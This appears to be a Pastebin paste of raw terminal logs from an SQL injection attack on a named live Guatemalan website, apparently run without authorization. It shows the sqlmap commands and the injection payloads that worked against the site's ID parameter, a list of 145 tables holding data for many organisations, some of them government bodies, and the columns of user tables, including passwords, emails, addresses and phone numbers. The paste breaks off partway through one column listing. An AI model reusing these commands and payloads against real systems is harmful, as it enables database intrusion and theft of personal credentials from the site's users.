API tools faq
paste
Advertisement
Netikerty

I lost my time, are you kidding me?

Netikerty
Feb 21st, 2013
116
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 35.52 KB | None | 0 0
raw download clone embed print report
  1. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios --tables
  2.  
  3. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  4. http://sqlmap.org
  5.  
  6. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  7.  
  8. [*] starting at 12:53:07
  9.  
  10. [12:53:07] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8
  11. [12:53:08] [INFO] resuming back-end DBMS 'mysql'
  12. [12:53:08] [INFO] testing connection to the target url
  13. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  14. ---
  15. Place: GET
  16. Parameter: ID
  17. Type: boolean-based blind
  18. Title: AND boolean-based blind - WHERE or HAVING clause
  19. Payload: ID=4233 AND 7933=7933
  20.  
  21. Type: error-based
  22. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  23. Payload: ID=4233 AND (SELECT 6237 FROM(SELECT COUNT(*),CONCAT(0x3a6363733a,(SELECT (CASE WHEN (6237=6237) THEN 1 ELSE 0 END)),0x3a78756e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  24.  
  25. Type: AND/OR time-based blind
  26. Title: MySQL > 5.0.11 AND time-based blind
  27. Payload: ID=4233 AND SLEEP(5)
  28. ---
  29.  
  30. [12:53:10] [INFO] the back-end DBMS is MySQL
  31. web server operating system: Linux Fedora 15 (Lovelock)
  32. web application technology: PHP 5.3.6, Apache 2.2.17
  33. back-end DBMS: MySQL 5.0
  34. [12:53:10] [INFO] fetching tables for database: 'dbusuarios'
  35. [12:53:11] [INFO] the SQL query used returns 145 entries
  36. [12:53:12] [INFO] retrieved: calendar
  37. [12:53:12] [INFO] retrieved: tbl_bnatelecomcom_precios
  38. [12:53:13] [INFO] retrieved: tbl_bnatelecomcom_precios2
  39. [12:53:14] [INFO] retrieved: tbl_calendar_aprofamorggt
  40. [12:53:15] [INFO] retrieved: tbl_calendar_casatibetguatemalaorg
  41. [12:53:15] [INFO] retrieved: tbl_calendar_cnnacomgt
  42. [12:53:16] [INFO] retrieved: tbl_calendar_cnnaorggt
  43. [12:53:16] [INFO] retrieved: tbl_calendar_conociendoguatemalacom
  44. [12:53:17] [INFO] retrieved: tbl_calendar_demo
  45. [12:53:17] [INFO] retrieved: tbl_calendar_gua05027org
  46. [12:53:18] [INFO] retrieved: tbl_calendar_ipmorggt
  47. [12:53:18] [INFO] retrieved: tbl_calendar_ipmorggt_public
  48. [12:53:19] [INFO] retrieved: tbl_calendar_mspasgobgt
  49. [12:53:19] [INFO] retrieved: tbl_calendar_ogaorggt
  50. [12:53:20] [INFO] retrieved: tbl_calendar_panadiverscom
  51. [12:53:21] [INFO] retrieved: tbl_calendar_pgngobgt
  52. [03:53:21] [INFO] retrieved: tbl_calendar_polsecorg
  53. [03:53:22] [INFO] retrieved: tbl_calendar_regdhorg
  54. [03:53:22] [INFO] retrieved: tbl_calendar_ripeoeaorg
  55. [12:53:23] [INFO] retrieved: tbl_calendar_semanasantaenlineacom
  56. [12:53:23] [INFO] retrieved: tbl_calendar_vientoencontracom
  57. [12:53:25] [INFO] retrieved: tbl_colegiados_colegiodefarmaceuticoscom
  58. [12:53:26] [INFO] retrieved: tbl_colegiados_saldo_colegiodefarmaceuticoscom
  59. [12:53:27] [INFO] retrieved: tbl_colegiados_saldo_quimicos_colegiodefarmaceuticoscom
  60. [12:53:28] [INFO] retrieved: tbl_csv_fields
  61. [12:53:28] [INFO] retrieved: tbl_csv_tables
  62. [12:53:29] [INFO] retrieved: tbl_puertos_sercimex
  63. [12:53:30] [INFO] retrieved: tbl_purchaseSession_bnatelecomcom
  64. [12:53:32] [INFO] retrieved: tbl_purchaseSession_creadoresvirtualescom
  65. [12:53:33] [INFO] retrieved: tbl_purchaseSession_demo
  66. [12:53:33] [INFO] retrieved: tbl_purchaseSession_discoverguatemalacomgt
  67. [12:53:34] [INFO] retrieved: tbl_purchaseSession_goathemayatravelcom
  68. [12:53:34] [INFO] retrieved: tbl_purchaseSession_telefoninotelcom
  69. [12:53:38] [INFO] retrieved: tbl_random_content_anabellycom
  70. [12:53:39] [INFO] retrieved: tbl_random_content_aprofamorggt
  71. [12:53:39] [INFO] retrieved: tbl_random_content_atacomgt
  72. [12:53:40] [INFO] retrieved: tbl_random_content_atravelcomgt
  73. [12:53:40] [INFO] retrieved: tbl_random_content_azulmodelajecom
  74. [12:53:41] [INFO] retrieved: tbl_random_content_biozoneguatemalacom
  75. [12:53:42] [INFO] retrieved: tbl_random_content_caciforggt
  76. [12:53:42] [INFO] retrieved: tbl_random_content_carrerasuniversitariascom
  77. [12:53:43] [INFO] retrieved: tbl_random_content_cnnaorggt
  78. [12:53:43] [INFO] retrieved: tbl_random_content_conociendoguatemalacom
  79. [12:53:44] [INFO] retrieved: tbl_random_content_ditcomgt
  80. [12:53:45] [INFO] retrieved: tbl_random_content_dobleviabiz
  81. [12:53:45] [INFO] retrieved: tbl_random_content_expodiscoverycom
  82. [12:53:50] [INFO] retrieved: tbl_random_content_globocentrocomgt
  83. [12:53:50] [INFO] retrieved: tbl_random_content_incidejovenorg
  84. [12:53:51] [INFO] retrieved: tbl_random_content_ipmorggt
  85. [12:53:51] [INFO] retrieved: tbl_random_content_iscargogroupcom
  86. [12:53:52] [INFO] retrieved: tbl_random_content_llatzercomgt
  87. [12:53:52] [INFO] retrieved: tbl_random_content_mijutiapacom
  88. [12:53:53] [INFO] retrieved: tbl_random_content_mpgobgt
  89. [12:53:53] [INFO] retrieved: tbl_random_content_mspasgobgt
  90. [12:53:54] [INFO] retrieved: tbl_random_content_pgngobgt
  91. [12:53:54] [INFO] retrieved: tbl_random_content_porminacionorg
  92. [12:53:55] [INFO] retrieved: tbl_random_content_semanasantaenlineacom
  93. [12:53:55] [INFO] retrieved: tbl_random_content_serinconet
  94. [12:53:56] [INFO] retrieved: tbl_random_content_sesangobgt
  95. [12:53:56] [INFO] retrieved: tbl_random_content_tecniscancom
  96. [12:54:26] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
  97. [12:54:28] [INFO] retrieved: tbl_random_content_testvientoencontracom
  98. [12:54:28] [INFO] retrieved: tbl_random_content_yeguadacastanoblecom
  99. [12:54:29] [INFO] retrieved: tbl_selectivo_sercimex
  100. [12:54:40] [INFO] retrieved: tbl_telefoninotelcom_precios
  101. [12:54:43] [INFO] retrieved: tbl_tracking_aduana_sercimexcom
  102. [12:54:44] [INFO] retrieved: tbl_tracking_demo
  103. [12:54:44] [INFO] retrieved: tbl_tracking_detail_demo
  104. [12:54:45] [INFO] retrieved: tbl_tracking_detail_mspasgobgt
  105. [12:54:45] [INFO] retrieved: tbl_tracking_detail_sercimexcom
  106. [12:54:46] [INFO] retrieved: tbl_tracking_detail_worldeliverycom
  107. [12:54:46] [INFO] retrieved: tbl_tracking_mspasgobgt
  108. [12:54:47] [INFO] retrieved: tbl_tracking_sercimexcom
  109. [12:54:47] [INFO] retrieved: tbl_tracking_worldeliverycom
  110. [12:54:48] [INFO] retrieved: tbl_user_adua
  111. [12:54:48] [INFO] retrieved: tbl_user_alberguesdetecpancom
  112. [12:54:49] [INFO] retrieved: tbl_user_anabellycom
  113. [12:54:49] [INFO] retrieved: tbl_user_aprofamorggt
  114. [12:54:50] [INFO] retrieved: tbl_user_auda
  115. [12:54:50] [INFO] retrieved: tbl_user_bnatelecomcom
  116. [12:54:51] [INFO] retrieved: tbl_user_casatibetguatemalaorg
  117. [12:54:54] [INFO] retrieved: tbl_user_cat_adua
  118. [12:54:55] [INFO] retrieved: tbl_user_cat_alberguesdetecpancom
  119. [12:54:57] [INFO] retrieved: tbl_user_cat_anabellycom
  120. [12:54:59] [INFO] retrieved: tbl_user_cat_auda
  121. [12:55:30] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
  122. [12:55:31] [INFO] retrieved: tbl_user_cat_bnatelecomcom
  123. [12:55:32] [INFO] retrieved: tbl_user_cat_casatibetguatemalaorg
  124. [12:55:33] [INFO] retrieved: tbl_user_cat_colegiofarmaceuticoscom
  125. [12:55:33] [INFO] retrieved: tbl_user_cat_creadoresvirtualescom
  126. [12:55:35] [INFO] retrieved: tbl_user_cat_demo
  127. [12:55:36] [INFO] retrieved: tbl_user_cat_dhvihorg
  128. [12:55:39] [INFO] retrieved: tbl_user_cat_discoverguatemalacomgt
  129. [12:55:40] [INFO] retrieved: tbl_user_cat_doblefcom
  130. [12:55:40] [INFO] retrieved: tbl_user_cat_fogel-groupcom
  131. [12:55:41] [INFO] retrieved: tbl_user_cat_fogelgroupcom
  132. [12:55:41] [INFO] retrieved: tbl_user_cat_gua05027org
  133. [12:55:42] [INFO] retrieved: tbl_user_cat_hidcacom
  134. [12:55:42] [INFO] retrieved: tbl_user_cat_ipmorggt
  135. [12:55:43] [INFO] retrieved: tbl_user_cat_llanezasacom
  136. [12:55:43] [INFO] retrieved: tbl_user_cat_mijutiapacom
  137. [12:55:44] [INFO] retrieved: tbl_user_cat_mpgobgt
  138. [12:55:44] [INFO] retrieved: tbl_user_cat_mspasgobgt
  139. [12:55:45] [INFO] retrieved: tbl_user_cat_multiequiposnet
  140. [12:55:45] [INFO] retrieved: tbl_user_cat_pgngobgt
  141. [12:55:46] [INFO] retrieved: tbl_user_cat_ripeoeaorg
  142. [12:55:46] [INFO] retrieved: tbl_user_cat_telefoninotelcom
  143. [12:55:51] [INFO] retrieved: tbl_user_cat_testvientoencontracom
  144. [12:55:52] [INFO] retrieved: tbl_user_cat_vesuviocomgt
  145. [12:55:52] [INFO] retrieved: tbl_user_cat_vientoencontracom
  146. [12:55:53] [INFO] retrieved: tbl_user_colegiodefarmaceuticoscom
  147. [12:55:53] [INFO] retrieved: tbl_user_creadoresvirtualescom
  148. [12:55:54] [INFO] retrieved: tbl_user_demo
  149. [12:55:54] [INFO] retrieved: tbl_user_dhvihorg
  150. [12:55:55] [INFO] retrieved: tbl_user_discoverguatemalacomgt
  151. [12:55:55] [INFO] retrieved: tbl_user_doblefcom
  152. [12:55:56] [INFO] retrieved: tbl_user_extra_field
  153. [12:55:56] [INFO] retrieved: tbl_user_fogel-groupcom
  154. [12:55:57] [INFO] retrieved: tbl_user_fogelgroupcom
  155. [12:55:57] [INFO] retrieved: tbl_user_gua05027org
  156. [12:56:01] [INFO] retrieved: tbl_user_hidcacom
  157. [12:56:01] [INFO] retrieved: tbl_user_incidejovenorg
  158. [12:56:02] [INFO] retrieved: tbl_user_ipmorggt
  159. [12:56:02] [INFO] retrieved: tbl_user_llanezasacom
  160. [12:56:03] [INFO] retrieved: tbl_user_log_adua
  161. [12:56:03] [INFO] retrieved: tbl_user_log_alberguesdetecpancom
  162. [12:56:04] [INFO] retrieved: tbl_user_log_bnatelecomcom
  163. [12:56:04] [INFO] retrieved: tbl_user_log_demo
  164. [12:56:05] [INFO] retrieved: tbl_user_log_discoverguatemalacomgt
  165. [12:56:05] [INFO] retrieved: tbl_user_log_gua05027org
  166. [12:56:06] [INFO] retrieved: tbl_user_log_mijutiapacom
  167. [12:56:06] [INFO] retrieved: tbl_user_log_mspasgobgt
  168. [12:56:07] [INFO] retrieved: tbl_user_log_porminacionorg
  169. [12:56:07] [INFO] retrieved: tbl_user_log_telefoninotelcom
  170. [12:56:08] [INFO] retrieved: tbl_user_log_testvientoencontracom
  171. [12:56:08] [INFO] retrieved: tbl_user_log_vientoencontracom
  172. [12:56:10] [INFO] retrieved: tbl_user_mijutiapacom
  173. [12:56:11] [INFO] retrieved: tbl_user_mpgobgt
  174. [12:56:11] [INFO] retrieved: tbl_user_mspasgobgt
  175. [12:56:11] [INFO] retrieved: tbl_user_multiequiposnet
  176. [12:56:12] [INFO] retrieved: tbl_user_pgngobgt
  177. [12:56:12] [INFO] retrieved: tbl_user_porminacionorg
  178. [12:56:13] [INFO] retrieved: tbl_user_ripeoeaorg
  179. [12:56:13] [INFO] retrieved: tbl_user_telefoninotelcom
  180. [12:56:14] [INFO] retrieved: tbl_user_testvientoencontracom
  181. [12:56:14] [INFO] retrieved: tbl_user_vesuviocomgt
  182. [12:56:15] [INFO] retrieved: tbl_user_vientoencontracom
  183. Database: dbusuarios
  184. [145 tables]
  185. +---------------------------------------------------------+
  186. | `tbl_user_cat_fogel-groupcom` |
  187. | `tbl_user_fogel-groupcom` |
  188. | calendar |
  189. | tbl_bnatelecomcom_precios |
  190. | tbl_bnatelecomcom_precios2 |
  191. | tbl_calendar_aprofamorggt |
  192. | tbl_calendar_casatibetguatemalaorg |
  193. | tbl_calendar_cnnacomgt |
  194. | tbl_calendar_cnnaorggt |
  195. | tbl_calendar_conociendoguatemalacom |
  196. | tbl_calendar_demo |
  197. | tbl_calendar_gua05027org |
  198. | tbl_calendar_ipmorggt |
  199. | tbl_calendar_ipmorggt_public |
  200. | tbl_calendar_mspasgobgt |
  201. | tbl_calendar_ogaorggt |
  202. | tbl_calendar_panadiverscom |
  203. | tbl_calendar_pgngobgt |
  204. | tbl_calendar_polsecorg |
  205. | tbl_calendar_regdhorg |
  206. | tbl_calendar_ripeoeaorg |
  207. | tbl_calendar_semanasantaenlineacom |
  208. | tbl_calendar_vientoencontracom |
  209. | tbl_colegiados_colegiodefarmaceuticoscom |
  210. | tbl_colegiados_saldo_colegiodefarmaceuticoscom |
  211. | tbl_colegiados_saldo_quimicos_colegiodefarmaceuticoscom |
  212. | tbl_csv_fields |
  213. | tbl_csv_tables |
  214. | tbl_puertos_sercimex |
  215. | tbl_purchaseSession_bnatelecomcom |
  216. | tbl_purchaseSession_creadoresvirtualescom |
  217. | tbl_purchaseSession_demo |
  218. | tbl_purchaseSession_discoverguatemalacomgt |
  219. | tbl_purchaseSession_goathemayatravelcom |
  220. | tbl_purchaseSession_telefoninotelcom |
  221. | tbl_random_content_anabellycom |
  222. | tbl_random_content_aprofamorggt |
  223. | tbl_random_content_atacomgt |
  224. | tbl_random_content_atravelcomgt |
  225. | tbl_random_content_azulmodelajecom |
  226. | tbl_random_content_biozoneguatemalacom |
  227. | tbl_random_content_caciforggt |
  228. | tbl_random_content_carrerasuniversitariascom |
  229. | tbl_random_content_cnnaorggt |
  230. | tbl_random_content_conociendoguatemalacom |
  231. | tbl_random_content_ditcomgt |
  232. | tbl_random_content_dobleviabiz |
  233. | tbl_random_content_expodiscoverycom |
  234. | tbl_random_content_globocentrocomgt |
  235. | tbl_random_content_incidejovenorg |
  236. | tbl_random_content_ipmorggt |
  237. | tbl_random_content_iscargogroupcom |
  238. | tbl_random_content_llatzercomgt |
  239. | tbl_random_content_mijutiapacom |
  240. | tbl_random_content_mpgobgt |
  241. | tbl_random_content_mspasgobgt |
  242. | tbl_random_content_pgngobgt |
  243. | tbl_random_content_porminacionorg |
  244. | tbl_random_content_semanasantaenlineacom |
  245. | tbl_random_content_serinconet |
  246. | tbl_random_content_sesangobgt |
  247. | tbl_random_content_tecniscancom |
  248. | tbl_random_content_testvientoencontracom |
  249. | tbl_random_content_yeguadacastanoblecom |
  250. | tbl_selectivo_sercimex |
  251. | tbl_telefoninotelcom_precios |
  252. | tbl_tracking_aduana_sercimexcom |
  253. | tbl_tracking_demo |
  254. | tbl_tracking_detail_demo |
  255. | tbl_tracking_detail_mspasgobgt |
  256. | tbl_tracking_detail_sercimexcom |
  257. | tbl_tracking_detail_worldeliverycom |
  258. | tbl_tracking_mspasgobgt |
  259. | tbl_tracking_sercimexcom |
  260. | tbl_tracking_worldeliverycom |
  261. | tbl_user_adua |
  262. | tbl_user_alberguesdetecpancom |
  263. | tbl_user_anabellycom |
  264. | tbl_user_aprofamorggt |
  265. | tbl_user_auda |
  266. | tbl_user_bnatelecomcom |
  267. | tbl_user_casatibetguatemalaorg |
  268. | tbl_user_cat_adua |
  269. | tbl_user_cat_alberguesdetecpancom |
  270. | tbl_user_cat_anabellycom |
  271. | tbl_user_cat_auda |
  272. | tbl_user_cat_bnatelecomcom |
  273. | tbl_user_cat_casatibetguatemalaorg |
  274. | tbl_user_cat_colegiofarmaceuticoscom |
  275. | tbl_user_cat_creadoresvirtualescom |
  276. | tbl_user_cat_demo |
  277. | tbl_user_cat_dhvihorg |
  278. | tbl_user_cat_discoverguatemalacomgt |
  279. | tbl_user_cat_doblefcom |
  280. | tbl_user_cat_fogelgroupcom |
  281. | tbl_user_cat_gua05027org |
  282. | tbl_user_cat_hidcacom |
  283. | tbl_user_cat_ipmorggt |
  284. | tbl_user_cat_llanezasacom |
  285. | tbl_user_cat_mijutiapacom |
  286. | tbl_user_cat_mpgobgt |
  287. | tbl_user_cat_mspasgobgt |
  288. | tbl_user_cat_multiequiposnet |
  289. | tbl_user_cat_pgngobgt |
  290. | tbl_user_cat_ripeoeaorg |
  291. | tbl_user_cat_telefoninotelcom |
  292. | tbl_user_cat_testvientoencontracom |
  293. | tbl_user_cat_vesuviocomgt |
  294. | tbl_user_cat_vientoencontracom |
  295. | tbl_user_colegiodefarmaceuticoscom |
  296. | tbl_user_creadoresvirtualescom |
  297. | tbl_user_demo |
  298. | tbl_user_dhvihorg |
  299. | tbl_user_discoverguatemalacomgt |
  300. | tbl_user_doblefcom |
  301. | tbl_user_extra_field |
  302. | tbl_user_fogelgroupcom |
  303. | tbl_user_gua05027org |
  304. | tbl_user_hidcacom |
  305. | tbl_user_incidejovenorg |
  306. | tbl_user_ipmorggt |
  307. | tbl_user_llanezasacom |
  308. | tbl_user_log_adua |
  309. | tbl_user_log_alberguesdetecpancom |
  310. | tbl_user_log_bnatelecomcom |
  311. | tbl_user_log_demo |
  312. | tbl_user_log_discoverguatemalacomgt |
  313. | tbl_user_log_gua05027org |
  314. | tbl_user_log_mijutiapacom |
  315. | tbl_user_log_mspasgobgt |
  316. | tbl_user_log_porminacionorg |
  317. | tbl_user_log_telefoninotelcom |
  318. | tbl_user_log_testvientoencontracom |
  319. | tbl_user_log_vientoencontracom |
  320. | tbl_user_mijutiapacom |
  321. | tbl_user_mpgobgt |
  322. | tbl_user_mspasgobgt |
  323. | tbl_user_multiequiposnet |
  324. | tbl_user_pgngobgt |
  325. | tbl_user_porminacionorg |
  326. | tbl_user_ripeoeaorg |
  327. | tbl_user_telefoninotelcom |
  328. | tbl_user_testvientoencontracom |
  329. | tbl_user_vesuviocomgt |
  330. | tbl_user_vientoencontracom |
  331. +---------------------------------------------------------+
  332.  
  333. [12:56:15] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.catedral.org.gt'
  334.  
  335. [*] shutting down at 12:56:15
  336.  
  337. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios -T tbl_user_demo --columns
  338.  
  339. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  340. http://sqlmap.org
  341.  
  342. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  343.  
  344. [*] starting at 01:08:11
  345.  
  346. [01:08:11] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian
  347. [00:08:11] [INFO] resuming back-end DBMS 'mysql'
  348. [00:08:12] [INFO] testing connection to the target url
  349. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  350. ---
  351. Place: GET
  352. Parameter: ID
  353. Type: boolean-based blind
  354. Title: AND boolean-based blind - WHERE or HAVING clause
  355. Payload: ID=4233 AND 7933=7933
  356.  
  357. Type: error-based
  358. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  359. Payload: ID=4233 AND (SELECT 6237 FROM(SELECT COUNT(*),CONCAT(0x3a6363733a,(SELECT (CASE WHEN (6237=6237) THEN 1 ELSE 0 END)),0x3a78756e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  360.  
  361. Type: AND/OR time-based blind
  362. Title: MySQL > 5.0.11 AND time-based blind
  363. Payload: ID=4233 AND SLEEP(5)
  364. ---
  365.  
  366. [01:08:13] [INFO] the back-end DBMS is MySQL
  367. web server operating system: Linux Fedora 15 (Lovelock)
  368. web application technology: PHP 5.3.6, Apache 2.2.17
  369. back-end DBMS: MySQL 5.0
  370. [01:08:13] [INFO] fetching columns for table 'tbl_user_demo' in database 'dbusuarios'
  371. [01:08:14] [INFO] the SQL query used returns 11 entries
  372. [01:08:15] [INFO] retrieved: ID_USER
  373. [01:08:15] [INFO] retrieved: mediumint(11)
  374. [01:08:16] [INFO] retrieved: strUserCateg
  375. [01:08:16] [INFO] retrieved: varchar(255)
  376. [01:08:16] [INFO] retrieved: strCodigo
  377. [01:08:17] [INFO] retrieved: varchar(64)
  378. [01:08:17] [INFO] retrieved: strUser
  379. [01:08:18] [INFO] retrieved: varchar(64)
  380. [01:08:18] [INFO] retrieved: strPassword
  381. [01:08:19] [INFO] retrieved: varchar(32)
  382. [01:08:21] [INFO] retrieved: strNombre
  383. [01:08:21] [INFO] retrieved: varchar(64)
  384. [01:08:22] [INFO] retrieved: strApellido
  385. [01:08:22] [INFO] retrieved: varchar(64)
  386. [01:08:23] [INFO] retrieved: strDireccion
  387. [01:08:23] [INFO] retrieved: varchar(255)
  388. [01:08:23] [INFO] retrieved: strTel
  389. [01:08:24] [INFO] retrieved: varchar(14)
  390. [01:08:25] [INFO] retrieved: strfax
  391. [01:08:25] [INFO] retrieved: varchar(14)
  392. [01:08:26] [INFO] retrieved: strEmail
  393. [01:08:27] [INFO] retrieved: varchar(128)
  394. Database: dbusuarios
  395. Table: tbl_user_demo
  396. [11 columns]
  397. +--------------+---------------+
  398. | Column | Type |
  399. +--------------+---------------+
  400. | ID_USER | mediumint(11) |
  401. | strApellido | varchar(64) |
  402. | strCodigo | varchar(64) |
  403. | strDireccion | varchar(255) |
  404. | strEmail | varchar(128) |
  405. | strfax | varchar(14) |
  406. | strNombre | varchar(64) |
  407. | strPassword | varchar(32) |
  408. | strTel | varchar(14) |
  409. | strUser | varchar(64) |
  410. | strUserCateg | varchar(255) |
  411. +--------------+---------------+
  412.  
  413. [01:08:27] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.catedral.org.gt'
  414.  
  415. [*] shutting down at 00:08:27
  416.  
  417. root@bt:/pentest/database/sqlmap# ./sqlmap.py -uhttp://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios -T tbl_user_demo --columns
  418.  
  419. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  420. http://sqlmap.org
  421.  
  422. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  423.  
  424. [*] starting at 00:12:52
  425.  
  426. [01:12:53] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.634.0 Safari/534.16
  427. [01:12:53] [INFO] resuming back-end DBMS 'mysql'
  428. [01:12:53] [INFO] testing connection to the target url
  429. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  430. ---
  431. Place: GET
  432. Parameter: ID
  433. Type: boolean-based blind
  434. Title: AND boolean-based blind - WHERE or HAVING clause
  435. Payload: ID=4233 AND 7933=7933
  436.  
  437. Type: error-based
  438. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  439. Payload: ID=4233 AND (SELECT 6237 FROM(SELECT COUNT(*),CONCAT(0x3a6363733a,(SELECT (CASE WHEN (6237=6237) THEN 1 ELSE 0 END)),0x3a78756e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  440.  
  441. Type: AND/OR time-based blind
  442. Title: MySQL > 5.0.11 AND time-based blind
  443. Payload: ID=4233 AND SLEEP(5)
  444. ---
  445.  
  446. [01:12:55] [INFO] the back-end DBMS is MySQL
  447. web server operating system: Linux Fedora 15 (Lovelock)
  448. web application technology: PHP 5.3.6, Apache 2.2.17
  449. back-end DBMS: MySQL 5.0
  450. [01:12:55] [INFO] fetching columns for table 'tbl_user_demo' in database 'dbusuarios'
  451. [01:12:55] [INFO] the SQL query used returns 11 entries
  452. [01:12:55] [INFO] resumed: ID_USER
  453. [01:12:55] [INFO] resumed: mediumint(11)
  454. [01:12:55] [INFO] resumed: strUserCateg
  455. [01:12:55] [INFO] resumed: varchar(255)
  456. [01:12:55] [INFO] resumed: strCodigo
  457. [01:12:55] [INFO] resumed: varchar(64)
  458. [01:12:55] [INFO] resumed: strUser
  459. [01:12:55] [INFO] resumed: varchar(64)
  460. [01:12:55] [INFO] resumed: strPassword
  461. [01:12:55] [INFO] resumed: varchar(32)
  462. [01:12:55] [INFO] resumed: strNombre
  463. [01:12:55] [INFO] resumed: varchar(64)
  464. [01:12:55] [INFO] resumed: strApellido
  465. [01:12:55] [INFO] resumed: varchar(64)
  466. [01:12:55] [INFO] resumed: strDireccion
  467. [01:12:55] [INFO] resumed: varchar(255)
  468. [01:12:55] [INFO] resumed: strTel
  469. [01:12:55] [INFO] resumed: varchar(14)
  470. [01:12:55] [INFO] resumed: strfax
  471. [01:12:55] [INFO] resumed: varchar(14)
  472. [01:12:55] [INFO] resumed: strEmail
  473. [01:12:55] [INFO] resumed: varchar(128)
  474. Database: dbusuarios
  475. Table: tbl_user_demo
  476. [11 columns]
  477. +--------------+---------------+
  478. | Column | Type |
  479. +--------------+---------------+
  480. | ID_USER | mediumint(11) |
  481. | strApellido | varchar(64) |
  482. | strCodigo | varchar(64) |
  483. | strDireccion | varchar(255) |
  484. | strEmail | varchar(128) |
  485. | strfax | varchar(14) |
  486. | strNombre | varchar(64) |
  487. | strPassword | varchar(32) |
  488. | strTel | varchar(14) |
  489. | strUser | varchar(64) |
  490. | strUserCateg | varchar(255) |
  491. +--------------+---------------+
  492.  
  493. [01:12:55] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.catedral.org.gt'
  494.  
  495. [*] shutting down at 01:12:55
  496.  
  497.  
  498. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios -T tbl_user_mspasgobgt --column
  499.  
  500. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  501. http://sqlmap.org
  502.  
  503. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  504.  
  505. [*] starting at 01:26:14
  506.  
  507. [01:26:14] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)
  508. [01:26:15] [INFO] resuming back-end DBMS 'mysql'
  509. [01:26:15] [INFO] testing connection to the target url
  510. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  511. ---
  512. Place: GET
  513. Parameter: ID
  514. Type: boolean-based blind
  515. Title: AND boolean-based blind - WHERE or HAVING clause
  516. Payload: ID=4233 AND 7933=7933
  517.  
  518. Type: error-based
  519. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  520. Payload: ID=4233 AND (SELECT 6237 FROM(SELECT COUNT(*),CONCAT(0x3a6363733a,(SELECT (CASE WHEN (6237=6237) THEN 1 ELSE 0 END)),0x3a78756e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  521.  
  522. Type: AND/OR time-based blind
  523. Title: MySQL > 5.0.11 AND time-based blind
  524. Payload: ID=4233 AND SLEEP(5)
  525. ---
  526.  
  527. [01:26:17] [INFO] the back-end DBMS is MySQL
  528. web server operating system: Linux Fedora 15 (Lovelock)
  529. web application technology: PHP 5.3.6, Apache 2.2.17
  530. back-end DBMS: MySQL 5.0
  531. [01:26:17] [INFO] fetching columns for table 'tbl_user_mspasgobgt' in database 'dbusuarios'
  532. [01:26:17] [INFO] the SQL query used returns 11 entries
  533. [01:26:18] [INFO] retrieved: ID_USER
  534. [01:26:18] [INFO] retrieved: mediumint(11)
  535. [01:26:20] [INFO] retrieved: strUserCateg
  536. [01:26:21] [INFO] retrieved: varchar(255)
  537. [01:26:21] [INFO] retrieved: strCodigo
  538. [01:26:22] [INFO] retrieved: varchar(64)
  539. [01:26:22] [INFO] retrieved: strUser
  540. [01:26:23] [INFO] retrieved: varchar(64)
  541. [01:26:23] [INFO] retrieved: strPassword
  542. [01:26:24] [INFO] retrieved: varchar(32)
  543. [01:26:24] [INFO] retrieved: strNombre
  544. [01:26:25] [INFO] retrieved: varchar(64)
  545. [01:26:25] [INFO] retrieved: strApellido
  546. [01:26:26] [INFO] retrieved: varchar(64)
